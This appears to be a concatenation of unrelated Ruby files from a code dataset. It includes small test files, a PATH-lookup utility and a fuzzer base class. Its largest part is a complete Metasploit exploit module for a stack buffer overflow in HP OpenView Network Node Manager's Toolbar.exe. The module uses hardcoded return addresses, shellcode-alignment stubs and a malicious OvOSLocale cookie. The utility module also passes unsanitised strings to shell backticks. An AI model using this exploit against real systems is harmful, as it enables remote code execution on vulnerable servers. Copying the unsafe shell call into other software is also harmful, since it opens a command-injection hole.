mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
_(table.encryption).must_be :nil?
encrypt_config = bigquery.encryption kms_key: kms_key
table.encryption = encrypt_config
_(table.encryption).must_be_kind_of Google::Cloud::Bigquery::EncryptionConfiguration
_(table.encryption.kms_key).must_equal kms_key
_(table.encryption).must_be :frozen?
mock.verify
end
def return_table table_hash
Google::Apis::BigqueryV2::Table.from_json(table_hash.to_json)
end
end
| 41.166667 | 175 | 0.751771 |
62695fdcae344ccc22ca46cb5aee3a7a24b48c54 | 3,261 | ## --- BEGIN LICENSE BLOCK ---
# Copyright (c) 2009, Mikio L. Braun
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Technische Universität Berlin nor the
# names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
## --- END LICENSE BLOCK ---
require 'set'
require 'config/config'
module Path
PATH = ENV['PATH'].split(':')
module_function
def where(file, path=PATH)
path.each do |p|
fn = File.join(p, file)
#print " Checking #{fn}"
if File.exist? fn
#puts " found"
if block_given?
return p if yield fn
else
return p
end
else
#puts
end
end
return
end
# returns the path to the command as specified by
# line or nil if the command does not exist, or
# it did not produce the right result
def where_with_output(line, output)
cmd = line.split[0]
p = where(cmd)
return unless p
out = %x(#{File.join(p,line)})
if out =~ output
return p
else
return
end
end
# Check whether a cmd could be found.
def check_cmd(*cmds)
cmds.each do |cmd|
Config.log "Searching for command #{cmd}"
Config.fail("coulnd't find command #{cmd}") unless Path.where cmd
end
yield self if block_given?
return
end
# Check whether files could be found in the given path.
def check_files(path, *files)
files.each do |file|
file = File.join(path, *file)
Config.log "Searching for file #{file}"
Config.fail("couldn't find #{file}") unless File.exist? file
end
yield if block_given?
return
end
# translate dir (mainly necessary for cygwin)
def dir(s)
case Config::CONFIG['OS_NAME']
when 'Windows'
s = s.gsub(/\\/, '\\\\\\\\')
%x(cygpath -u '#{s}').chomp
else
s # safe default...
end
end
end | 30.476636 | 72 | 0.671266 |
381e2cbf6a59e2864f3310b40ad034de14e32eb3 | 462 | # frozen_string_literal: true
module Jfuzz
class Generator
def initialize(property, property_fuzzer)
@property = property
@property_fuzzer = property_fuzzer
end
def try_generate
generate
end
def self.type
raise "`type` must be implemented by sub class"
end
private
def generate
raise "`generate` must be implemented by sub class"
end
attr_reader :property, :property_fuzzer
end
end
| 17.111111 | 57 | 0.675325 |
6a2469a8961fac9060bd143b9f71f83fd10ec19e | 433 | require_relative 'test_helper'
require 'import_controller'
require 'options'
class ImportControllerTest < Minitest::Test
include TestHelper
include FileSystemTestMixin
def test_untested
# p test_options.filename
# p subject.yaml_file_path
assert true
end
def subject
ImportController.new test_options, test_config
end
def setup
init_temp_dir
end
def teardown
destroy_temp_dir
end
end
| 16.037037 | 50 | 0.759815 |
b9af5de8d0f2681aa677654e589b14700770e003 | 719 | require 'rails_helper'
RSpec.describe UserDatatable, type: :datatable do
let(:user_datatable) do
described_class.new(instance_double('view', params: params),
options)
end
let(:account) { create(:account) }
let(:user) { create(:user, account: account) }
# supporting data
let(:params) do
ActionController::Parameters.new('columns': {})
end
let(:options) do
{
current_account: account
}
end
before { user }
describe '#to_json' do
let(:expected_json) do
{
"recordsTotal": 1,
"data": [{
email: user.email
}]
}
end
it { expect(user_datatable.to_json).to include_json(expected_json) }
end
end
| 20.542857 | 72 | 0.603616 |
2119ef254a9bc5e56d3e728653200ccbffc6fed5 | 148 | require 'rails_helper'
RSpec.describe "tag_xy/viewPage_name.html.erb", type: :view do
pending "add some examples to (or delete) #{__FILE__}"
end
| 24.666667 | 62 | 0.75 |
08adb256c0d7368321d620c9a4dba7dd9b6fe9de | 196 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../shared/trace', __FILE__)
require 'matrix'
describe "Matrix#trace" do
it_behaves_like(:trace, :trace)
end
| 24.5 | 58 | 0.734694 |
d53f58ec5b2163954561196adfd48ebe58df6596 | 5,341 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0
and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an
attacker may be able to execute arbitrary code. Please note that this module only works
against a specific build (ie. NNM 7.53_01195)
},
'License' => MSF_LICENSE,
'Author' =>
[
'Oren Isacson', # original discovery
'juan vazquez', # metasploit module (7.0 target)
'sinn3r', # 7.53_01195 target
],
'References' =>
[
[ 'CVE', '2009-0920' ],
[ 'OSVDB', '53242' ],
[ 'BID', '34294' ],
[ 'URL', 'http://www.coresecurity.com/content/openview-buffer-overflows']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => false,
'Payload' =>
{
'Space' => 4000,
'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f\x3b\x2b",
'DisableNops' => true, # no need
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EDX'
}
},
'Platform' => 'win',
'Targets' =>
[
[
#Windows XP SP3
'HP OpenView Network Node Manager Release B.07.00',
{
'Ret' => 0x5A212147, # ovsnmp.dll call esp
'Offset' => 0xFC, # until EIP
# Pointer to string with length < 0x100
# Avoid crash before vulnerable function returns
# And should work as a "NOP" since it will prepend shellcode
#'ReadAddress' => 0x5A03A225,# ov.dll
'ReadAddress' => 0x5A03A225,# ov.dll
'EDXAdjust' => 0x17,
# 0x8 => offset until "0x90" nops
# 0x4 => "0x90" nops
# 0x2 => len(push esp, pop edx)
# 0x3 => len(sub)
# 0x6 => len(add)
}
],
[
#Windows Server 2003
'HP OpenView Network Node Manager 7.53 Patch 01195',
{
'Eax' => 0x5a456eac, #Readable address for CMP BYTE PTR DS:[EAX],0
'EaxOffset' => 251, #Offset to overwrite EAX
'Ret' => 0x5A23377C, #CALL EDI
'Max' => 8000, #Max buffer size
}
]
],
'DisclosureDate' => 'Jan 21 2009'))
end
def exploit
if target.name =~ /7\.53/
#EDX alignment for alphanumeric shellcode
#payload is in EDI first. We exchange it with EDX, align EDX, and then
#jump to it.
align = "\x87\xfa" #xchg edi,edx
align << "\x80\xc2\x27" #add dl,0x27
align << "\xff\xe2" #jmp edx
#Add the alignment code to payload
p = align + payload.encoded
sploit = 'en_US'
sploit << rand_text_alphanumeric(247)
sploit << [target.ret].pack('V*')
sploit << rand_text_alphanumeric(target['EaxOffset']-sploit.length+'en_US'.length)
sploit << [target['Eax']].pack('V*')
sploit << rand_text_alphanumeric(3200)
sploit << make_nops(100 - align.length)
sploit << align
sploit << p
sploit << rand_text_alphanumeric(target['Max']-sploit.length)
elsif target.name =~ /B\.07\.00/
edx = Rex::Arch::X86::EDX
sploit = "en_US"
sploit << rand_text_alphanumeric(target['Offset'] - "en_US".length, payload_badchars)
sploit << [target.ret].pack('V')
sploit << [target['ReadAddress']].pack('V')
sploit << "\x90\x90\x90\x90"
# Get in EDX a pointer to the shellcode start
sploit << "\x54" # push esp
sploit << "\x5A" # pop edx
sploit << Rex::Arch::X86.sub(-(target['EDXAdjust']), edx, payload_badchars, false, true)
sploit << "\x81\xc4\x48\xf4\xff\xff" # add esp, -3000
sploit << payload.encoded
end
#Send the malicious request to /OvCgi/ToolBar.exe
#If the buffer contains a badchar, NNM 7.53 will return a "400 Bad Request".
#If the exploit causes ToolBar.exe to crash, NNM returns "error in CGI Application"
send_request_raw({
'uri' => "/OvCgi/Toolbar.exe",
'method' => "GET",
'cookie' => "OvOSLocale=" + sploit + "; OvAcceptLang=en-usa",
}, 20)
handler
disconnect
end
end
=begin
NNM B.07.00's badchar set:
00 0D 0A 20 3B 3D 2C 2B
NNM 7.53_01195's badchar set:
01 02 03 04 05 06 07 08 0a 0b 0c 0d 0e 0f 10 11 ................
12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 7f ...............
3b = delimiter
2b = gets converted to 0x2b
=end
| 34.019108 | 165 | 0.544467 |
1a138a3c3d9deaa4e5620f32d40b172fba84628b | 350 | require "test_helper"
class ReadonlyTest < MiniTest::Spec
class SongForm < Reform::Form
property :artist
property :title, writeable: false
# TODO: what to do with virtual values?
end
let (:form) { SongForm.new(OpenStruct.new) }
it { form.readonly?(:artist).must_equal false }
it { form.readonly?(:title).must_equal true }
end | 25 | 49 | 0.7 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.